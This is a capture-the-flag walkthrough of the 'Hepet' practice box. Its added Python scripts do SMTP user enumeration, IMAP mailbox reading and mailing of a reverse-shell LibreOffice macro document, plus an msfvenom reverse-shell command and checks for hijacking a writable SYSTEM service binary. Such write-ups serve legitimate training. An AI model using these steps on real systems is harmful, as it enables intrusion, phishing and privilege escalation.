Hepet - Proving Grounds Practice
Enumeration
Nmap
The initial nmap scan showed the mail ports (SMTP and IMAP are used later) and HTTP on port 8000 open. FTP and VNC were also listening, on non-standard ports.
Web Enumeration
The web page on port 8000 listed several people's names. One of them had a description that differed from all the others, which made it worth keeping as a password candidate.
I first generated a username list from those names with username-anarchy, then validated it against the SMTP service with smtp-user-enum, which confirmed 5 valid users.
Next I brute-forced the IMAP, SMTP and SMB logins. I started with the null/same/reversed checks (hydra's -e nsr options: empty password, password equal to the username, and the username reversed). Trying the unusual description value from the web page as a password then gave me valid IMAP credentials for jonas.
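The two enumeration steps above (generating username candidates from the names on the page, then checking them against SMTP) as one script. This is an added example written for this page, not the username-anarchy or smtp-user-enum tools the writeup actually used; the sample names are constructed, and the MAIL FROM address and the `localhost` domain are assumptions.

```python
"""Username candidates from names, then SMTP user enumeration.
Added example (not username-anarchy / smtp-user-enum). Run with:
    python smtp_enum.py TARGET_IP
"""
import smtplib
import sys

# Constructed sample names; not the names from the target web page.
SAMPLE_NAMES = ["Jonas Doe", "Jane Roe"]


def candidate_usernames(full_name):
    """username-anarchy-style formats for one 'First Last' name, deduplicated."""
    parts = full_name.lower().split()
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    cands = [first, last, first + last, first + "." + last, first[0] + last,
             first + last[0], last + first, first[0] + "." + last,
             first + "_" + last]
    seen, out = set(), []
    for c in cands:
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def classify_reply(code):
    """Map an SMTP reply to VRFY / RCPT TO onto a verdict.
    250/251 = mailbox known; 550/551/553 = mailbox unknown;
    252 ("cannot VRFY but will accept") and anything else is inconclusive."""
    if code in (250, 251):
        return "valid"
    if code in (550, 551, 553):
        return "invalid"
    return "unknown"


def enumerate_users(host, candidates, domain="localhost", port=25,
                    method="RCPT", timeout=5):
    """Probe each candidate and return {username: verdict}.
    VRFY is often disabled; RCPT TO after a MAIL FROM usually still leaks
    whether a local mailbox exists. The MAIL FROM address is an assumption."""
    verdicts = {}
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo_or_helo_if_needed()
        for user in candidates:
            if method.upper() == "VRFY":
                code, _ = smtp.verify(user)
            else:
                smtp.mail("probe@" + domain)
                code, _ = smtp.rcpt("%s@%s" % (user, domain))
                smtp.rset()  # reset the envelope before the next candidate
            verdicts[user] = classify_reply(code)
    return verdicts


if __name__ == "__main__":
    cands = [u for n in SAMPLE_NAMES for u in candidate_usernames(n)]
    for user, verdict in enumerate_users(sys.argv[1], cands).items():
        if verdict == "valid":
            print(user)
```

Treat "unknown" verdicts as unresolved rather than invalid: a server answering 252 to everything tells you nothing, and you fall back to RCPT TO or to the IMAP/SMTP login brute force.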
Following this IMAP pentesting guide (https://hackviser.com/tactics/pentesting/services/imap), I connected to the IMAP service, logged in with those credentials and read the mailbox with raw IMAP commands:
a1 LOGIN username password
a2 LIST "" "*"
a3 SELECT INBOX
a4 FETCH 1 BODY[]
One of the emails said that they use LibreOffice and open every document that arrives as an attachment, which points to a malicious LibreOffice macro as the way in.
It also revealed the target mailbox, mailadmin@localhost.
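The same mailbox walk (LOGIN, SELECT INBOX, FETCH each message) done with Python's imaplib, with the bodies parsed so that the hints the writeup found by reading (LibreOffice, attachments) can be picked out automatically. This is an added example, not the writeup's own method; the sample message is constructed for the example and is not the real email from the box, and the port/TLS defaults are assumptions.

```python
"""Read a mailbox over IMAP and flag messages worth reading closely.
Added example; the writeup did this by hand with raw IMAP commands.
Run with: python imap_read.py TARGET_IP jonas PASSWORD
"""
import email
import imaplib
import sys
from email import policy

# Constructed sample message in the spirit of the one the writeup describes.
# It is NOT the real email from the target.
SAMPLE_MAIL = b"\r\n".join([
    b"From: mailadmin@localhost",
    b"To: jonas@localhost",
    b"Subject: Document handling",
    b"Content-Type: text/plain; charset=us-ascii",
    b"",
    b"Hi Jonas,",
    b"We moved everyone to LibreOffice, so send spreadsheets as .ods.",
    b"I open every attachment that arrives, so just mail it to me.",
    b"",
])


def parse_message(raw):
    """Turn one RFC822 message into the fields a reviewer cares about."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    return {
        "from": str(msg["From"]),
        "to": str(msg["To"]),
        "subject": str(msg["Subject"]),
        "text": body.get_content() if body is not None else "",
        "attachments": [p.get_filename() for p in msg.iter_attachments()],
    }


def mentions(summary, *keywords):
    """Return the keywords that appear in the subject or body (case-insensitive)."""
    hay = (summary["subject"] + "\n" + summary["text"]).lower()
    return [k for k in keywords if k.lower() in hay]


def read_mailbox(host, username, password, port=143, use_ssl=False,
                 mailbox="INBOX"):
    """Fetch every message in the mailbox read-only and parse it."""
    client = imaplib.IMAP4_SSL if use_ssl else imaplib.IMAP4
    with client(host, port) as conn:
        conn.login(username, password)
        conn.select(mailbox, readonly=True)  # do not flip \Seen flags
        _, data = conn.search(None, "ALL")
        messages = []
        for num in data[0].split():
            _, parts = conn.fetch(num, "(RFC822)")
            messages.append(parse_message(parts[0][1]))
        return messages


if __name__ == "__main__":
    host, user, pw = sys.argv[1:4]
    for m in read_mailbox(host, user, pw):
        print(m["from"], "->", m["to"], "|", m["subject"], "|", m["attachments"])
        print("   hints:", mentions(m, "libreoffice", "attach", "macro"))
```

Selecting the mailbox read-only matters on an engagement: the raw FETCH in the guide marks messages as read, which a careful mail admin may notice.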
Exploitation
Malicious Macro - LibreOffice
The 0bfxgh0st/MMG-LO repository generates LibreOffice documents with an embedded reverse-shell macro.
I used it to create a malicious ODS file, started a netcat listener on LPORT, and mailed the file to mailadmin with swaks:
python mmg-ods.py windows LHOST LPORT
swaks -t mailadmin@localhost --from jonas@localhost --attach @MALICIOUS_FILE --server TARGET_IP --body "hi" --header "subject: test"
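The swaks command above as a short smtplib script, so the MIME structure is visible: the attachment is declared as an OpenDocument spreadsheet rather than a generic application/octet-stream, which is what a mail client keys on when it hands the file to LibreOffice. This is an added example, not part of the writeup; the file name and the plain-SMTP port 25 are assumptions, and MALICIOUS_FILE is whatever mmg-ods.py produced.

```python
"""Mail a document to the target mailbox with the right MIME type.
Added example; the writeup used swaks. Usage:
    python send_doc.py TARGET_IP MALICIOUS_FILE
"""
import mimetypes
import smtplib
import sys
from email.message import EmailMessage
from pathlib import Path

# OpenDocument spreadsheet. mimetypes does not know .ods on every system,
# so the type is pinned explicitly instead of trusting the guess.
ODS_MIME = ("application", "vnd.oasis.opendocument.spreadsheet")


def build_message(sender, recipient, subject, body, filename, payload):
    """Build a multipart message: text body plus one binary attachment."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    if filename.lower().endswith(".ods"):
        maintype, subtype = ODS_MIME
    else:
        guessed = mimetypes.guess_type(filename)[0] or "application/octet-stream"
        maintype, subtype = guessed.split("/", 1)
    msg.add_attachment(payload, maintype=maintype, subtype=subtype,
                       filename=filename)
    return msg


def attachment_summary(msg):
    """(filename, content-type) for every attachment, for a pre-send check."""
    return [(p.get_filename(), p.get_content_type())
            for p in msg.iter_attachments()]


def send(msg, server, port=25, timeout=10):
    """Deliver via the target's own SMTP service, as swaks --server does."""
    with smtplib.SMTP(server, port, timeout=timeout) as smtp:
        smtp.send_message(msg)


if __name__ == "__main__":
    server, path = sys.argv[1], Path(sys.argv[2])
    msg = build_message("jonas@localhost", "mailadmin@localhost", "test", "hi",
                        path.name, path.read_bytes())
    print(attachment_summary(msg))
    send(msg, server)
```

Have the listener up before this runs: the macro fires as soon as the document is opened, and the writeup's emails say every attachment gets opened.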
After a short wait the macro fired and I had a shell as the user.
Privilege Escalation
Service Abuse (Writeable Service Binary)
Running PowerUp.ps1 (Invoke-AllChecks) showed that VeyonService runs as SYSTEM and that its service binary was writable by my user.
So I first created a malicious executable with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=8080 -f exe -o exp.exe
Then I transferred it to the target and overwrote veyon-service.exe with it. (Back up the original first if you want to restore the service afterwards.)
I had no permission to restart the service, so I restarted the machine with shutdown /s /t 0 instead. Note that /s requests a shutdown rather than a restart (shutdown /r /t 0 is the restart form), and that this approach relies on the service being set to start automatically at boot; the START_TYPE line of sc qc VeyonService shows that.
Once the box came back up, the service started my binary and I had a SYSTEM shell.
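Before overwriting a service binary, the three things to confirm are the ones this section relies on: the service runs as SYSTEM, it starts automatically at boot (otherwise a reboot will not launch the replaced binary), and a low-privilege principal really holds write rights on the file. The script below checks all three from the output of `sc qc <service>` and `icacls <binary>` pasted from the target; it is an added example run on the attacking machine, not PowerUp and not the writeup's own code. The sample outputs are constructed, and the install path C:\Program Files\Veyon\veyon-service.exe is an assumption (the writeup does not give it).

```python
"""Pre-flight checks for the writable-service-binary technique.
Added example; not PowerUp. Usage:
    python svc_preflight.py sc_qc.txt icacls.txt
(without arguments it runs against the constructed samples below)
"""
import json
import re
import sys

# Constructed sample output, shaped like `sc qc VeyonService`.
# The install path is an assumption; the writeup does not state it.
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Veyon\veyon-service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Veyon Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed sample output, shaped like `icacls <binary>`.
ICACLS_OUTPUT = r"""C:\Program Files\Veyon\veyon-service.exe BUILTIN\Users:(F)
                                          NT AUTHORITY\SYSTEM:(F)
                                          BUILTIN\Administrators:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Rights that let a user replace the file contents. (I), (OI), (CI) are
# inheritance flags, not rights, and are ignored by the check.
WRITE_RIGHTS = {"F", "M", "W", "WD"}
LOW_PRIV_PRINCIPALS = {"BUILTIN\\Users", "Everyone",
                       "NT AUTHORITY\\Authenticated Users",
                       "NT AUTHORITY\\INTERACTIVE"}

# principal (DOMAIN\Name or Everyone) followed by one or more (...) groups
ACE_RE = re.compile(r"([^\s:\\][^:\\\n]*\\[^:\\\n]+|Everyone):((?:\([^)]*\))+)")


def parse_sc_qc(text):
    """KEY : value lines of sc qc output as a dict."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def parse_icacls(text, path):
    """[(principal, set_of_rights), ...] from icacls output for `path`.
    icacls prints the path before the first ACE; it is removed first so
    path components cannot be mistaken for part of a principal name."""
    text = text.replace(path, "", 1)
    aces = []
    for m in ACE_RE.finditer(text):
        rights = set()
        for grp in re.findall(r"\(([^)]*)\)", m.group(2)):
            rights.update(r.strip() for r in grp.split(","))
        aces.append((m.group(1).strip(), rights))
    return aces


def preflight(sc_text, icacls_text):
    """The three facts the binary-replacement path depends on."""
    cfg = parse_sc_qc(sc_text)
    path = cfg.get("BINARY_PATH_NAME", "").strip('"')
    aces = parse_icacls(icacls_text, path)
    writable_by = [p for p, rights in aces
                   if p in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS]
    return {
        "binary": path,
        "runs_as_system": cfg.get("SERVICE_START_NAME", "").lower() == "localsystem",
        "auto_start": "AUTO_START" in cfg.get("START_TYPE", ""),
        "writable_by": writable_by,
    }


if __name__ == "__main__":
    if len(sys.argv) > 2:
        sc_text, ic_text = open(sys.argv[1]).read(), open(sys.argv[2]).read()
    else:
        sc_text, ic_text = SC_QC_OUTPUT, ICACLS_OUTPUT
    print(json.dumps(preflight(sc_text, ic_text), indent=2))
```

If auto_start is false, a reboot does nothing for you and you need a different trigger (a restart right on the service, or a service that something else starts on demand); if writable_by is empty but PowerUp still flagged the file, look at the directory ACL instead, since delete-and-recreate on the parent folder reaches the same result.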